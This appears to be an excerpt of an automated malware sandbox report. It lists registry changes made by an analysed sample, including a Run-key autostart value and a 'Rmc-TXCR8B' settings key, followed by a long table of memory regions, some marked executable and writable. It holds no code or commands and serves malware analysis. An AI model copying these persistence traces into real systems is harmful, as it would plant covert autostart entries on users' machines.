HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
ConsoleTracingMask
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
MaxFileSize
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
FileDirectory
|
||
|
HKEY_CURRENT_USER\SOFTWARE\Darksomeness
|
Subtropiske
|
||
|
HKEY_CURRENT_USER\Environment
|
Assumably
|
||
|
HKEY_CURRENT_USER\SOFTWARE\Rmc-TXCR8B
|
exepath
|
||
|
HKEY_CURRENT_USER\SOFTWARE\Rmc-TXCR8B
|
licence
|
||
|
HKEY_CURRENT_USER\SOFTWARE\Rmc-TXCR8B
|
time
|
||
|
HKEY_CURRENT_USER_Classes\Local Settings\Software\Microsoft\Windows\Shell\MuiCache
|
LangID
|
||
|
HKEY_CURRENT_USER_Classes\Local Settings\Software\Microsoft\Windows\Shell\MuiCache
|
C:\Windows\System32\WScript.exe.FriendlyAppName
|
||
|
HKEY_CURRENT_USER_Classes\Local Settings\Software\Microsoft\Windows\Shell\MuiCache
|
C:\Windows\System32\WScript.exe.ApplicationCompany
|
||
|
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
|
Gummicheckene
|
There are 13 hidden registries, click here to show them.
Memdumps
|
Base Address
|
Regiontype
|
Protect
|
Malicious
|
|
|---|---|---|---|---|
|
D545000
|
direct allocation
|
page execute and read and write
|
|
|
|
8EE0000
|
direct allocation
|
page execute and read and write
|
|
|
|
92F7000
|
heap
|
page read and write
|
|
|
|
606C000
|
trusted library allocation
|
page read and write
|
|
|
|
1209006F000
|
trusted library allocation
|
page read and write
|
|
|
|
788E000
|
stack
|
page read and write
|
||
|
7AF9000
|
heap
|
page read and write
|
||
|
9355000
|
heap
|
page read and write
|
||
|
5489000
|
trusted library allocation
|
page read and write
|
||
|
5647000
|
trusted library allocation
|
page read and write
|
||
|
736E000
|
stack
|
page read and write
|
||
|
824000
|
heap
|
page read and write
|
||
|
4991000
|
heap
|
page read and write
|
||
|
80A000
|
heap
|
page read and write
|
||
|
49DD000
|
heap
|
page read and write
|
||
|
2718F000
|
heap
|
page read and write
|
||
|
2F34000
|
heap
|
page read and write
|
||
|
8B9B000
|
trusted library allocation
|
page read and write
|
||
|
496F000
|
unkown
|
page read and write
|
||
|
818000
|
heap
|
page read and write
|
||
|
49A0000
|
heap
|
page read and write
|
||
|
120F0235000
|
heap
|
page read and write
|
||
|
830000
|
heap
|
page read and write
|
||
|
7620000
|
heap
|
page read and write
|
||
|
2F35000
|
heap
|
page read and write
|
||
|
25C3B000
|
heap
|
page read and write
|
||
|
1A3F8FD000
|
stack
|
page read and write
|
||
|
52C0000
|
trusted library allocation
|
page read and write
|
||
|
499B000
|
heap
|
page read and write
|
||
|
2F35000
|
heap
|
page read and write
|
||
|
2734000
|
heap
|
page read and write
|
||
|
45C000
|
system
|
page execute and read and write
|
||
|
4991000
|
heap
|
page read and write
|
||
|
9351000
|
heap
|
page read and write
|
||
|
A345000
|
direct allocation
|
page execute and read and write
|
||
|
49AC000
|
heap
|
page read and write
|
||
|
5857000
|
trusted library allocation
|
page read and write
|
||
|
5794000
|
trusted library allocation
|
page read and write
|
||
|
499B000
|
heap
|
page read and write
|
||
|
4991000
|
heap
|
page read and write
|
||
|
4A10000
|
heap
|
page read and write
|
||
|
2521A000
|
heap
|
page read and write
|
||
|
2734000
|
heap
|
page read and write
|
||
|
2B1F000
|
stack
|
page read and write
|
||
|
87B7000
|
stack
|
page read and write
|
||
|
7DE0000
|
trusted library allocation
|
page read and write
|
||
|
49A7000
|
heap
|
page read and write
|
||
|
120EE22E000
|
heap
|
page read and write
|
||
|
933E000
|
heap
|
page read and write
|
||
|
935D000
|
heap
|
page read and write
|
||
|
26B7B000
|
heap
|
page read and write
|
||
|
811000
|
heap
|
page read and write
|
||
|
24BB0000
|
remote allocation
|
page read and write
|
||
|
4997000
|
heap
|
page read and write
|
||
|
25181000
|
heap
|
page read and write
|
||
|
8945000
|
heap
|
page read and write
|
||
|
49A9000
|
heap
|
page read and write
|
||
|
2F1A000
|
heap
|
page read and write
|
||
|
49A2000
|
heap
|
page read and write
|
||
|
27BE000
|
unkown
|
page read and write
|
||
|
2940000
|
heap
|
page read and write
|
||
|
2734000
|
heap
|
page read and write
|
||
|
83E000
|
heap
|
page read and write
|
||
|
120F0210000
|
heap
|
page read and write
|
||
|
933E000
|
heap
|
page read and write
|
||
|
2B70000
|
heap
|
page read and write
|
||
|
1209000F000
|
trusted library allocation
|
page read and write
|
||
|
2F34000
|
heap
|
page read and write
|
||
|
7C00000
|
trusted library allocation
|
page read and write
|
||
|
810000
|
heap
|
page read and write
|
||
|
49A9000
|
heap
|
page read and write
|
||
|
2F7E000
|
stack
|
page read and write
|
||
|
814000
|
heap
|
page read and write
|
||
|
7C10000
|
trusted library allocation
|
page execute and read and write
|
||
|
50C0000
|
heap
|
page read and write
|
||
|
3260000
|
heap
|
page read and write
|
||
|
120EFBD0000
|
heap
|
page read and write
|
||
|
25455000
|
heap
|
page read and write
|
||
|
7FFD9B950000
|
trusted library allocation
|
page execute and read and write
|
||
|
52C0000
|
trusted library allocation
|
page read and write
|
||
|
7F7000
|
heap
|
page read and write
|
||
|
27D0000
|
heap
|
page read and write
|
||
|
2613E000
|
heap
|
page read and write
|
||
|
12090001000
|
trusted library allocation
|
page read and write
|
||
|
1A3FDFE000
|
stack
|
page read and write
|
||
|
1208022C000
|
trusted library allocation
|
page read and write
|
||
|
9351000
|
heap
|
page read and write
|
||
|
50BF000
|
stack
|
page read and write
|
||
|
1A3FA7E000
|
stack
|
page read and write
|
||
|
7FFD9B790000
|
trusted library allocation
|
page read and write
|
||
|
12080B84000
|
trusted library allocation
|
page read and write
|
||
|
9300000
|
heap
|
page read and write
|
||
|
83A000
|
heap
|
page read and write
|
||
|
933E000
|
heap
|
page read and write
|
||
|
50C1000
|
heap
|
page read and write
|
||
|
2734000
|
heap
|
page read and write
|
||
|
120815BB000
|
trusted library allocation
|
page read and write
|
||
|
2D20000
|
heap
|
page read and write
|
||
|
2F10000
|
heap
|
page read and write
|
||
|
811000
|
heap
|
page read and write
|
||
|
934B000
|
heap
|
page read and write
|
||
|
49A2000
|
heap
|
page read and write
|
||
|
8D3C000
|
stack
|
page read and write
|
||
|
44E000
|
stack
|
page read and write
|
||
|
795E000
|
stack
|
page read and write
|
||
|
81A000
|
heap
|
page read and write
|
||
|
1A3FFFB000
|
stack
|
page read and write
|
||
|
75FA000
|
stack
|
page read and write
|
||
|
818000
|
heap
|
page read and write
|
||
|
49A3000
|
heap
|
page read and write
|
||
|
2780000
|
heap
|
page readonly
|
||
|
120F0331000
|
heap
|
page read and write
|
||
|
49A9000
|
heap
|
page read and write
|
||
|
560F000
|
trusted library allocation
|
page read and write
|
||
|
49A0000
|
heap
|
page read and write
|
||
|
25531000
|
heap
|
page read and write
|
||
|
56B6000
|
trusted library allocation
|
page read and write
|
||
|
935D000
|
heap
|
page read and write
|
||
|
8F70000
|
direct allocation
|
page read and write
|
||
|
9358000
|
heap
|
page read and write
|
||
|
80F000
|
heap
|
page read and write
|
||
|
26BC000
|
stack
|
page read and write
|
||
|
2F34000
|
heap
|
page read and write
|
||
|
120EE3A5000
|
heap
|
page read and write
|
||
|
49A4000
|
heap
|
page read and write
|
||
|
2520A000
|
heap
|
page read and write
|
||
|
12080B99000
|
trusted library allocation
|
page read and write
|
||
|
88E0000
|
trusted library allocation
|
page read and write
|
||
|
780A000
|
stack
|
page read and write
|
||
|
843000
|
heap
|
page read and write
|
||
|
9351000
|
heap
|
page read and write
|
||
|
3311000
|
heap
|
page read and write
|
||
|
120F026C000
|
heap
|
page read and write
|
||
|
935D000
|
heap
|
page read and write
|
||
|
44D8000
|
heap
|
page read and write
|
||
|
58FD000
|
trusted library allocation
|
page read and write
|
||
|
828000
|
heap
|
page read and write
|
||
|
7FFD9B9B0000
|
trusted library allocation
|
page read and write
|
||
|
74BD000
|
stack
|
page read and write
|
||
|
2F1A000
|
heap
|
page read and write
|
||
|
4A19000
|
heap
|
page read and write
|
||
|
742E000
|
stack
|
page read and write
|
||
|
9347000
|
heap
|
page read and write
|
||
|
7510000
|
direct allocation
|
page read and write
|
||
|
5709000
|
trusted library allocation
|
page read and write
|
||
|
820000
|
heap
|
page read and write
|
||
|
7F7000
|
heap
|
page read and write
|
||
|
7FFD9BA80000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9BA90000
|
trusted library allocation
|
page read and write
|
||
|
7DC0000
|
trusted library allocation
|
page read and write
|
||
|
4997000
|
heap
|
page read and write
|
||
|
12081E00000
|
trusted library allocation
|
page read and write
|
||
|
1A3FB7D000
|
stack
|
page read and write
|
||
|
7FFD9B8A0000
|
trusted library allocation
|
page execute and read and write
|
||
|
7BF0000
|
heap
|
page execute and read and write
|
||
|
50C1000
|
heap
|
page read and write
|
||
|
7E8000
|
heap
|
page read and write
|
||
|
840000
|
heap
|
page read and write
|
||
|
24BB0000
|
remote allocation
|
page read and write
|
||
|
2B24000
|
stack
|
page read and write
|
||
|
2F30000
|
heap
|
page read and write
|
||
|
251F8000
|
heap
|
page read and write
|
||
|
7C6E000
|
stack
|
page read and write
|
||
|
2734000
|
heap
|
page read and write
|
||
|
2F34000
|
heap
|
page read and write
|
||
|
2B3E000
|
stack
|
page read and write
|
||
|
50C4000
|
heap
|
page read and write
|
||
|
7FFD9BA70000
|
trusted library allocation
|
page read and write
|
||
|
52C0000
|
trusted library allocation
|
page read and write
|
||
|
7FA000
|
heap
|
page read and write
|
||
|
4990000
|
heap
|
page read and write
|
||
|
81A000
|
heap
|
page read and write
|
||
|
7FFD9B9E0000
|
trusted library allocation
|
page read and write
|
||
|
92FA000
|
heap
|
page read and write
|
||
|
4999000
|
heap
|
page read and write
|
||
|
AD45000
|
direct allocation
|
page execute and read and write
|
||
|
270D000
|
stack
|
page read and write
|
||
|
4D90000
|
trusted library allocation
|
page read and write
|
||
|
2BE3000
|
heap
|
page read and write
|
||
|
7500000
|
direct allocation
|
page read and write
|
||
|
4997000
|
heap
|
page read and write
|
||
|
12081D7C000
|
trusted library allocation
|
page read and write
|
||
|
2F34000
|
heap
|
page read and write
|
||
|
2B22000
|
stack
|
page read and write
|
||
|
50C1000
|
heap
|
page read and write
|
||
|
2F34000
|
heap
|
page read and write
|
||
|
1208008D000
|
trusted library allocation
|
page read and write
|
||
|
837000
|
heap
|
page read and write
|
||
|
8992000
|
heap
|
page read and write
|
||
|
1A3FEFE000
|
stack
|
page read and write
|
||
|
815000
|
heap
|
page read and write
|
||
|
8BB0000
|
trusted library allocation
|
page read and write
|
||
|
120902F8000
|
trusted library allocation
|
page read and write
|
||
|
562B000
|
trusted library allocation
|
page read and write
|
||
|
9358000
|
heap
|
page read and write
|
||
|
2F1A000
|
heap
|
page read and write
|
||
|
7B06000
|
heap
|
page read and write
|
||
|
49BA000
|
heap
|
page read and write
|
||
|
7290000
|
heap
|
page execute and read and write
|
||
|
2734000
|
heap
|
page read and write
|
||
|
2F1A000
|
heap
|
page read and write
|
||
|
25225000
|
heap
|
page read and write
|
||
|
4D0000
|
heap
|
page read and write
|
||
|
4E80000
|
heap
|
page read and write
|
||
|
82E000
|
heap
|
page read and write
|
||
|
7FFD9B9F0000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9BA10000
|
trusted library allocation
|
page read and write
|
||
|
825000
|
heap
|
page read and write
|
||
|
83A000
|
heap
|
page read and write
|
||
|
120F05B0000
|
heap
|
page read and write
|
||
|
933E000
|
heap
|
page read and write
|
||
|
1A3F97E000
|
stack
|
page read and write
|
||
|
9351000
|
heap
|
page read and write
|
||
|
2D2E000
|
heap
|
page read and write
|
||
|
27093000
|
heap
|
page read and write
|
||
|
120EE330000
|
trusted library allocation
|
page read and write
|
||
|
52C0000
|
trusted library allocation
|
page read and write
|
||
|
1A3FC77000
|
stack
|
page read and write
|
||
|
490000
|
heap
|
page read and write
|
||
|
9351000
|
heap
|
page read and write
|
||
|
2F35000
|
heap
|
page read and write
|
||
|
49A9000
|
heap
|
page read and write
|
||
|
49AC000
|
heap
|
page read and write
|
||
|
E945000
|
direct allocation
|
page execute and read and write
|
||
|
2F0E000
|
unkown
|
page read and write
|
||
|
52C0000
|
trusted library allocation
|
page read and write
|
||
|
26B73000
|
heap
|
page read and write
|
||
|
83F000
|
heap
|
page read and write
|
||
|
7FFD9BAC0000
|
trusted library allocation
|
page read and write
|
||
|
2F80000
|
trusted library allocation
|
page read and write
|
||
|
120F059B000
|
heap
|
page read and write
|
||
|
80B000
|
heap
|
page read and write
|
||
|
1208164A000
|
trusted library allocation
|
page read and write
|
||
|
1A3FAFE000
|
stack
|
page read and write
|
||
|
5483000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9B782000
|
trusted library allocation
|
page read and write
|
||
|
75BD000
|
stack
|
page read and write
|
||
|
50C8000
|
heap
|
page read and write
|
||
|
933E000
|
heap
|
page read and write
|
||
|
819000
|
heap
|
page read and write
|
||
|
49CA000
|
heap
|
page read and write
|
||
|
8E8D000
|
stack
|
page read and write
|
||
|
2960000
|
heap
|
page read and write
|
||
|
7FFD9B836000
|
trusted library allocation
|
page read and write
|
||
|
49A1000
|
heap
|
page read and write
|
||
|
933E000
|
heap
|
page read and write
|
||
|
812000
|
heap
|
page read and write
|
||
|
87C0000
|
trusted library allocation
|
page execute and read and write
|
||
|
4EA0000
|
trusted library allocation
|
page execute and read and write
|
||
|
7FB000
|
heap
|
page read and write
|
||
|
27093000
|
heap
|
page read and write
|
||
|
26F9000
|
stack
|
page read and write
|
||
|
7D30000
|
trusted library allocation
|
page read and write
|
||
|
49A0000
|
heap
|
page read and write
|
||
|
49A9000
|
heap
|
page read and write
|
||
|
7CAE000
|
stack
|
page read and write
|
||
|
12080499000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9BAA0000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9B980000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9B9C0000
|
trusted library allocation
|
page read and write
|
||
|
2664D000
|
heap
|
page read and write
|
||
|
933E000
|
heap
|
page read and write
|
||
|
49A1000
|
heap
|
page read and write
|
||
|
835000
|
heap
|
page read and write
|
||
|
49AC000
|
heap
|
page read and write
|
||
|
2F34000
|
heap
|
page read and write
|
||
|
79D1000
|
heap
|
page read and write
|
||
|
27084000
|
heap
|
page read and write
|
||
|
120EFC30000
|
heap
|
page execute and read and write
|
||
|
8E4E000
|
stack
|
page read and write
|
||
|
610000
|
heap
|
page read and write
|
||
|
2734000
|
heap
|
page read and write
|
||
|
2613B000
|
heap
|
page read and write
|
||
|
25450000
|
heap
|
page read and write
|
||
|
823000
|
heap
|
page read and write
|
||
|
2FD9000
|
stack
|
page read and write
|
||
|
120F051E000
|
heap
|
page read and write
|
||
|
8951000
|
heap
|
page read and write
|
||
|
4990000
|
heap
|
page read and write
|
||
|
27084000
|
heap
|
page read and write
|
||
|
400000
|
system
|
page execute and read and write
|
||
|
8EC0000
|
trusted library allocation
|
page read and write
|
||
|
2F34000
|
heap
|
page read and write
|
||
|
DF45000
|
direct allocation
|
page execute and read and write
|
||
|
4DA0000
|
trusted library allocation
|
page read and write
|
||
|
83D000
|
heap
|
page read and write
|
||
|
837000
|
heap
|
page read and write
|
||
|
44DE000
|
stack
|
page read and write
|
||
|
4995000
|
heap
|
page read and write
|
||
|
49D3000
|
heap
|
page read and write
|
||
|
25309000
|
heap
|
page read and write
|
||
|
9359000
|
heap
|
page read and write
|
||
|
5018000
|
trusted library allocation
|
page read and write
|
||
|
4970000
|
heap
|
page read and write
|
||
|
1A409CF000
|
stack
|
page read and write
|
||
|
1208049D000
|
trusted library allocation
|
page read and write
|
||
|
1208048C000
|
trusted library allocation
|
page read and write
|
||
|
499B000
|
heap
|
page read and write
|
||
|
9358000
|
heap
|
page read and write
|
||
|
3250000
|
heap
|
page read and write
|
||
|
72EE000
|
stack
|
page read and write
|
||
|
1A3F536000
|
stack
|
page read and write
|
||
|
935D000
|
heap
|
page read and write
|
||
|
26644000
|
heap
|
page read and write
|
||
|
933E000
|
heap
|
page read and write
|
||
|
120F0480000
|
heap
|
page execute and read and write
|
||
|
2734000
|
heap
|
page read and write
|
||
|
49A2000
|
heap
|
page read and write
|
||
|
120EE279000
|
heap
|
page read and write
|
||
|
7F7000
|
heap
|
page read and write
|
||
|
251F8000
|
heap
|
page read and write
|
||
|
120F0519000
|
heap
|
page read and write
|
||
|
8830000
|
trusted library allocation
|
page read and write
|
||
|
7D40000
|
trusted library allocation
|
page read and write
|
||
|
50C9000
|
heap
|
page read and write
|
||
|
DDE000
|
stack
|
page read and write
|
||
|
120F02FB000
|
heap
|
page read and write
|
||
|
933E000
|
heap
|
page read and write
|
||
|
827000
|
heap
|
page read and write
|
||
|
934B000
|
heap
|
page read and write
|
||
|
25181000
|
heap
|
page read and write
|
||
|
8ED0000
|
trusted library allocation
|
page read and write
|
||
|
4990000
|
heap
|
page read and write
|
||
|
83A000
|
heap
|
page read and write
|
||
|
2F9C000
|
stack
|
page read and write
|
||
|
784E000
|
stack
|
page read and write
|
||
|
73EE000
|
stack
|
page read and write
|
||
|
2F19000
|
heap
|
page read and write
|
||
|
81B000
|
heap
|
page read and write
|
||
|
120F0310000
|
heap
|
page read and write
|
||
|
2F34000
|
heap
|
page read and write
|
||
|
120EFCF0000
|
heap
|
page read and write
|
||
|
934B000
|
heap
|
page read and write
|
||
|
26B75000
|
heap
|
page read and write
|
||
|
615000
|
heap
|
page read and write
|
||
|
49AC000
|
heap
|
page read and write
|
||
|
7D90000
|
trusted library allocation
|
page read and write
|
||
|
934B000
|
heap
|
page read and write
|
||
|
49AC000
|
heap
|
page read and write
|
||
|
7FFD9BA40000
|
trusted library allocation
|
page read and write
|
||
|
49A6000
|
heap
|
page read and write
|
||
|
120EE020000
|
heap
|
page read and write
|
||
|
935D000
|
heap
|
page read and write
|
||
|
49BE000
|
heap
|
page read and write
|
||
|
4E81000
|
heap
|
page read and write
|
||
|
12080B6D000
|
trusted library allocation
|
page read and write
|
||
|
499D000
|
heap
|
page read and write
|
||
|
26136000
|
heap
|
page read and write
|
||
|
8CF0000
|
trusted library allocation
|
page read and write
|
||
|
29CE000
|
unkown
|
page read and write
|
||
|
49A9000
|
heap
|
page read and write
|
||
|
827000
|
heap
|
page read and write
|
||
|
473000
|
system
|
page execute and read and write
|
||
|
49DD000
|
heap
|
page read and write
|
||
|
49AC000
|
heap
|
page read and write
|
||
|
120EFB80000
|
trusted library allocation
|
page read and write
|
||
|
26132000
|
heap
|
page read and write
|
||
|
120F05B6000
|
heap
|
page read and write
|
||
|
C96000
|
heap
|
page read and write
|
||
|
26647000
|
heap
|
page read and write
|
||
|
88CE000
|
stack
|
page read and write
|
||
|
4F22000
|
trusted library allocation
|
page read and write
|
||
|
57CC000
|
trusted library allocation
|
page read and write
|
||
|
2F3F000
|
stack
|
page read and write
|
||
|
935D000
|
heap
|
page read and write
|
||
|
7D70000
|
trusted library allocation
|
page read and write
|
||
|
934B000
|
heap
|
page read and write
|
||
|
49B3000
|
heap
|
page read and write
|
||
|
49B8000
|
heap
|
page read and write
|
||
|
49A7000
|
heap
|
page read and write
|
||
|
120EE350000
|
trusted library allocation
|
page read and write
|
||
|
2613E000
|
heap
|
page read and write
|
||
|
8820000
|
heap
|
page read and write
|
||
|
7DD0000
|
trusted library allocation
|
page read and write
|
||
|
7530000
|
direct allocation
|
page read and write
|
||
|
2D2D000
|
heap
|
page read and write
|
||
|
50C9000
|
heap
|
page read and write
|
||
|
7FFD9B93A000
|
trusted library allocation
|
page read and write
|
||
|
2B06000
|
stack
|
page read and write
|
||
|
49BB000
|
heap
|
page read and write
|
||
|
4B4F000
|
stack
|
page read and write
|
||
|
822000
|
heap
|
page read and write
|
||
|
499B000
|
heap
|
page read and write
|
||
|
120EFCF5000
|
heap
|
page read and write
|
||
|
9355000
|
heap
|
page read and write
|
||
|
7FFD9B78D000
|
trusted library allocation
|
page execute and read and write
|
||
|
4990000
|
heap
|
page read and write
|
||
|
120EE300000
|
trusted library allocation
|
page read and write
|
||
|
7540000
|
direct allocation
|
page read and write
|
||
|
4EC1000
|
trusted library allocation
|
page read and write
|
||
|
799E000
|
stack
|
page read and write
|
||
|
4991000
|
heap
|
page read and write
|
||
|
2F35000
|
heap
|
page read and write
|
||
|
4911000
|
heap
|
page read and write
|
||
|
120F0272000
|
heap
|
page read and write
|
||
|
8840000
|
heap
|
page read and write
|
||
|
49AC000
|
heap
|
page read and write
|
||
|
4D84000
|
trusted library allocation
|
page read and write
|
||
|
7295000
|
heap
|
page execute and read and write
|
||
|
82E000
|
heap
|
page read and write
|
||
|
36F0000
|
heap
|
page read and write
|
||
|
55D8000
|
trusted library allocation
|
page read and write
|
||
|
934B000
|
heap
|
page read and write
|
||
|
7FFD9BAB0000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9B783000
|
trusted library allocation
|
page execute and read and write
|
||
|
2770000
|
heap
|
page read and write
|
||
|
81C000
|
heap
|
page read and write
|
||
|
933E000
|
heap
|
page read and write
|
||
|
9355000
|
heap
|
page read and write
|
||
|
120F0490000
|
heap
|
page read and write
|
||
|
4999000
|
heap
|
page read and write
|
||
|
120EE25A000
|
heap
|
page read and write
|
||
|
50C8000
|
heap
|
page read and write
|
||
|
4D40000
|
heap
|
page read and write
|
||
|
120F0104000
|
heap
|
page read and write
|
||
|
49A9000
|
heap
|
page read and write
|
||
|
25C37000
|
heap
|
page read and write
|
||
|
3258000
|
heap
|
page read and write
|
||
|
2734000
|
heap
|
page read and write
|
||
|
4E81000
|
heap
|
page read and write
|
||
|
4DB5000
|
trusted library allocation
|
page execute and read and write
|
||
|
4990000
|
heap
|
page read and write
|
||
|
2FD0000
|
heap
|
page read and write
|
||
|
49A9000
|
heap
|
page read and write
|
||
|
811000
|
heap
|
page read and write
|
||
|
2F34000
|
heap
|
page read and write
|
||
|
935D000
|
heap
|
page read and write
|
||
|
25181000
|
heap
|
page read and write
|
||
|
27084000
|
heap
|
page read and write
|
||
|
7CEE000
|
stack
|
page read and write
|
||
|
4A19000
|
heap
|
page read and write
|
||
|
7AE9000
|
heap
|
page read and write
|
||
|
120EE340000
|
heap
|
page readonly
|
||
|
890000
|
heap
|
page read and write
|
||
|
2BED000
|
heap
|
page read and write
|
||
|
2543F000
|
heap
|
page read and write
|
||
|
7E5000
|
heap
|
page read and write
|
||
|
7FFD9BB00000
|
trusted library allocation
|
page read and write
|
||
|
251F8000
|
heap
|
page read and write
|
||
|
2BA0000
|
heap
|
page readonly
|
||
|
49A6000
|
heap
|
page read and write
|
||
|
1A40B4B000
|
stack
|
page read and write
|
||
|
253FC000
|
heap
|
page read and write
|
||
|
820000
|
heap
|
page read and write
|
||
|
678000
|
heap
|
page read and write
|
||
|
49BB000
|
heap
|
page read and write
|
||
|
8810000
|
trusted library allocation
|
page execute and read and write
|
||
|
83A000
|
heap
|
page read and write
|
||
|
933E000
|
heap
|
page read and write
|
||
|
120F0487000
|
heap
|
page execute and read and write
|
||
|
830000
|
heap
|
page read and write
|
||
|
934E000
|
heap
|
page read and write
|
||
|
7FFD9BA20000
|
trusted library allocation
|
page read and write
|
||
|
12081F79000
|
trusted library allocation
|
page read and write
|
||
|
27093000
|
heap
|
page read and write
|
||
|
77CE000
|
stack
|
page read and write
|
||
|
12080BA0000
|
trusted library allocation
|
page read and write
|
||
|
58E000
|
stack
|
page read and write
|
||
|
1A3F87E000
|
stack
|
page read and write
|
||
|
935D000
|
heap
|
page read and write
|
||
|
2B90000
|
heap
|
page read and write
|
||
|
25D5000
|
stack
|
page read and write
|
||
|
49BB000
|
heap
|
page read and write
|
||
|
57B0000
|
trusted library allocation
|
page read and write
|
||
|
12081D93000
|
trusted library allocation
|
page read and write
|
||
|
2D2E000
|
heap
|
page read and write
|
||
|
12080BBB000
|
trusted library allocation
|
page read and write
|
||
|
25291000
|
heap
|
page read and write
|
||
|
2B2E000
|
heap
|
page read and write
|
||
|
27FE000
|
unkown
|
page read and write
|
||
|
92F3000
|
heap
|
page read and write
|
||
|
12081DA1000
|
trusted library allocation
|
page read and write
|
||
|
8B90000
|
trusted library allocation
|
page read and write
|
||
|
7E8000
|
heap
|
page read and write
|
||
|
834000
|
heap
|
page read and write
|
||
|
4D80000
|
trusted library allocation
|
page read and write
|
||
|
49A6000
|
heap
|
page read and write
|
||
|
2F34000
|
heap
|
page read and write
|
||
|
81E000
|
heap
|
page read and write
|
||
|
934D000
|
heap
|
page read and write
|
||
|
825000
|
heap
|
page read and write
|
||
|
9351000
|
heap
|
page read and write
|
||
|
4A4E000
|
stack
|
page read and write
|
||
|
120F0544000
|
heap
|
page read and write
|
||
|
2F1B000
|
heap
|
page read and write
|
||
|
120EE100000
|
heap
|
page read and write
|
||
|
9945000
|
direct allocation
|
page execute and read and write
|
||
|
4E1E000
|
stack
|
page read and write
|
||
|
C145000
|
direct allocation
|
page execute and read and write
|
||
|
7FFD9B9D0000
|
trusted library allocation
|
page read and write
|
||
|
24BB0000
|
remote allocation
|
page read and write
|
||
|
49A2000
|
heap
|
page read and write
|
||
|
25C33000
|
heap
|
page read and write
|
||
|
C90000
|
heap
|
page read and write
|
||
|
7FFD9B83C000
|
trusted library allocation
|
page execute and read and write
|
||
|
4A19000
|
heap
|
page read and write
|
||
|
32B0000
|
heap
|
page read and write
|
||
|
25C39000
|
heap
|
page read and write
|
||
|
7D50000
|
trusted library allocation
|
page read and write
|
||
|
8E0C000
|
stack
|
page read and write
|
||
|
9359000
|
heap
|
page read and write
|
||
|
2F1B000
|
heap
|
page read and write
|
||
|
120EE284000
|
heap
|
page read and write
|
||
|
2FDA000
|
heap
|
page read and write
|
||
|
2664C000
|
heap
|
page read and write
|
||
|
2734000
|
heap
|
page read and write
|
||
|
49A9000
|
heap
|
page read and write
|
||
|
2734000
|
heap
|
page read and write
|
||
|
49A5000
|
heap
|
page read and write
|
||
|
351E000
|
stack
|
page read and write
|
||
|
4E60000
|
heap
|
page readonly
|
||
|
540000
|
heap
|
page read and write
|
||
|
4DAA000
|
trusted library allocation
|
page execute and read and write
|
||
|
2520B000
|
heap
|
page read and write
|
||
|
9300000
|
heap
|
page read and write
|
||
|
8900000
|
trusted library allocation
|
page read and write
|
||
|
34DD000
|
stack
|
page read and write
|
||
|
7F7000
|
heap
|
page read and write
|
||
|
5725000
|
trusted library allocation
|
page read and write
|
||
|
12081D81000
|
trusted library allocation
|
page read and write
|
||
|
4D70000
|
trusted library allocation
|
page read and write
|
||
|
2857000
|
heap
|
page read and write
|
||
|
817000
|
heap
|
page read and write
|
||
|
2521A000
|
heap
|
page read and write
|
||
|
2F1B000
|
heap
|
page read and write
|
||
|
58AA000
|
trusted library allocation
|
page read and write
|
||
|
2873000
|
heap
|
page read and write
|
||
|
81F000
|
heap
|
page read and write
|
||
|
2F17000
|
heap
|
page read and write
|
||
|
2543B000
|
heap
|
page read and write
|
||
|
2FFA000
|
heap
|
page read and write
|
||
|
8D7B000
|
stack
|
page read and write
|
||
|
120F00F0000
|
heap
|
page execute and read and write
|
||
|
50C3000
|
heap
|
page read and write
|
||
|
2BE0000
|
heap
|
page read and write
|
||
|
25225000
|
heap
|
page read and write
|
||
|
2F1A000
|
heap
|
page read and write
|
||
|
4911000
|
heap
|
page read and write
|
||
|
259C000
|
stack
|
page read and write
|
||
|
120902E9000
|
trusted library allocation
|
page read and write
|
||
|
4DD0000
|
trusted library allocation
|
page read and write
|
||
|
770000
|
heap
|
page read and write
|
||
|
4EB0000
|
heap
|
page read and write
|
||
|
7FFD9BA50000
|
trusted library allocation
|
page read and write
|
||
|
2AFD000
|
stack
|
page read and write
|
||
|
7AC0000
|
trusted library allocation
|
page read and write
|
||
|
26B70000
|
heap
|
page read and write
|
||
|
4E5E000
|
stack
|
page read and write
|
||
|
120EFCF7000
|
heap
|
page read and write
|
||
|
8B8D000
|
stack
|
page read and write
|
||
|
27093000
|
heap
|
page read and write
|
||
|
27093000
|
heap
|
page read and write
|
||
|
2B0A000
|
heap
|
page read and write
|
||
|
7550000
|
direct allocation
|
page read and write
|
||
|
2F1A000
|
heap
|
page read and write
|
||
|
B745000
|
direct allocation
|
page execute and read and write
|
||
|
48F000
|
stack
|
page read and write
|
||
|
3305000
|
heap
|
page read and write
|
||
|
1A40ACA000
|
stack
|
page read and write
|
||
|
2B94000
|
heap
|
page read and write
|
||
|
7FFD9BB10000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9B840000
|
trusted library allocation
|
page execute and read and write
|
||
|
1A3F9FB000
|
stack
|
page read and write
|
||
|
4A1D000
|
heap
|
page read and write
|
||
|
25560000
|
heap
|
page read and write
|
||
|
791E000
|
stack
|
page read and write
|
||
|
1A3F5BE000
|
stack
|
page read and write
|
||
|
120F027A000
|
heap
|
page read and write
|
||
|
5EC1000
|
trusted library allocation
|
page read and write
|
||
|
8955000
|
heap
|
page read and write
|
||
|
7520000
|
direct allocation
|
page read and write
|
||
|
813000
|
heap
|
page read and write
|
||
|
8EA0000
|
trusted library allocation
|
page read and write
|
||
|
12081DA5000
|
trusted library allocation
|
page read and write
|
||
|
6053000
|
trusted library allocation
|
page read and write
|
||
|
49A9000
|
heap
|
page read and write
|
||
|
456000
|
system
|
page execute and read and write
|
||
|
842000
|
heap
|
page read and write
|
||
|
7F7000
|
heap
|
page read and write
|
||
|
459000
|
system
|
page execute and read and write
|
||
|
7280000
|
trusted library allocation
|
page read and write
|
||
|
25455000
|
heap
|
page read and write
|
||
|
25450000
|
heap
|
page read and write
|
||
|
7AE0000
|
heap
|
page read and write
|
